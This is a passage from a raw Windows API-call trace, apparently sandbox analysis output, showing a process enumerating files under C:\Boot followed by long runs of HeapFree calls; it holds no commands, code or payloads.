cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0045.908] FindNextFileW (in: hFindFile=0x4260588, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0045.908] FindClose (in: hFindFile=0x4260588 | out: hFindFile=0x4260588) returned 1 [0045.908] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.908] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0045.908] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xef703e94, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0045.908] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef4fcd12, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x185a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="bootvhd.dll", cAlternateFileName="")) returned 1 [0045.908] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0045.908] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.908] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42604c8 [0045.910] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.914] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.914] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.914] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.915] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.915] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.916] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.916] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.916] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.917] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.920] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.921] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.921] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.922] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.922] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.923] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.923] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.924] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.924] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.924] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.925] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.925] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.926] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.926] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.927] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.927] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.928] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42712c0 | out: hHeap=0x5d0000) returned 1 [0045.928] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.929] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.929] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.929] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.930] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.930] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.931] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.932] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.932] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.933] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.936] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.937] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0046.652] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0046.652] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3c00050 | out: hHeap=0x5d0000) returned 1 [0046.652] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3c00050 | out: hHeap=0x5d0000) returned 1 [0047.934] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3c00050 | out: hHeap=0x5d0000) returned 1 [0047.950] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3c00050 | out: hHeap=0x5d0000) returned 1 [0047.950] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3c00050 | out: hHeap=0x5d0000) returned 1 [0047.952] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0047.959] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0047.960] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0047.960] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0047.961] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0047.961] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0047.962] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0047.962] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0047.962] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0047.965] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0047.967] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0047.967] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0047.967] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0047.968] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0047.968] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0047.969] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0047.971] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0047.971] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0047.972] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0048.215] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0048.215] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0048.215] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0048.216] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0048.216] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0048.216] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0048.216] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0048.216] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x627720, Size=0x4000) returned 0x6be970 [0048.216] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0048.218] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.218] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.218] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.218] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.220] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.220] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.220] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.220] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.220] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.220] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.220] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.220] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.221] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.221] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.221] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.221] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.221] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.221] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.222] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.225] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.225] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.225] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.225] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.225] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.225] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.225] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.225] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0048.226] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0048.226] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.228] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0048.228] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.228] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0048.228] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0049.717] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0054.028] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0054.028] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0054.028] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0054.028] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0054.028] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0054.029] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0054.029] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0054.029] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0054.029] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0054.030] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0054.030] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0054.031] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0054.031] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0054.031] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0054.125] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0054.125] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0054.129] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0054.131] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0054.131] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d1098 | out: hHeap=0x5d0000) returned 1 [0054.133] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0054.134] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43110b8 | out: hHeap=0x5d0000) returned 1 [0054.135] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43110b8 | out: hHeap=0x5d0000) returned 1 [0054.135] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43110b8 | out: hHeap=0x5d0000) returned 1 [0054.135] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0054.747] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0054.753] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0054.756] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0054.756] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43210c0 | out: hHeap=0x5d0000) returned 1 [0055.352] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0055.353] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0055.356] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0055.596] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0055.623] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0055.849] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0056.025] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0056.025] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0056.028] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0056.051] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0056.335] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0056.335] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43210c0 | out: hHeap=0x5d0000) returned 1 [0056.336] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43110b8 | out: hHeap=0x5d0000) returned 1 [0056.337] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0056.344] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0056.360] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0056.363] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43010b0 | out: hHeap=0x5d0000) returned 1 [0056.793] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43110b8 | out: hHeap=0x5d0000) returned 1 [0056.798] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0056.798] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43110b8 | out: hHeap=0x5d0000) returned 1 [0056.798] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43010b0 | out: hHeap=0x5d0000) returned 1 [0060.038] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0060.040] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0060.043] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0060.043] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43310c8 | out: hHeap=0x5d0000) returned 1 [0060.045] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43310c8 | out: hHeap=0x5d0000) returned 1 [0060.048] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43310c8 | out: hHeap=0x5d0000) returned 1 [0060.054] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43310c8 | out: hHeap=0x5d0000) returned 1 [0061.147] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43310c8 | out: hHeap=0x5d0000) returned 1 [0061.148] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0061.155] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0061.155] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0061.156] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0061.159] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0061.159] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0061.164] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4321010 | out: hHeap=0x5d0000) returned 1 [0061.167] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4321010 | out: hHeap=0x5d0000) returned 1 [0061.633] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4321010 | out: hHeap=0x5d0000) returned 1 [0061.672] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4321010 | out: hHeap=0x5d0000) returned 1 [0061.674] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4321010 | out: hHeap=0x5d0000) returned 1 [0061.680] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0061.680] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0061.680] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0061.680] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0061.682] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0061.685] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0061.686] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.307] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.309] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.311] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.313] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.314] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.316] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.320] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.321] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: 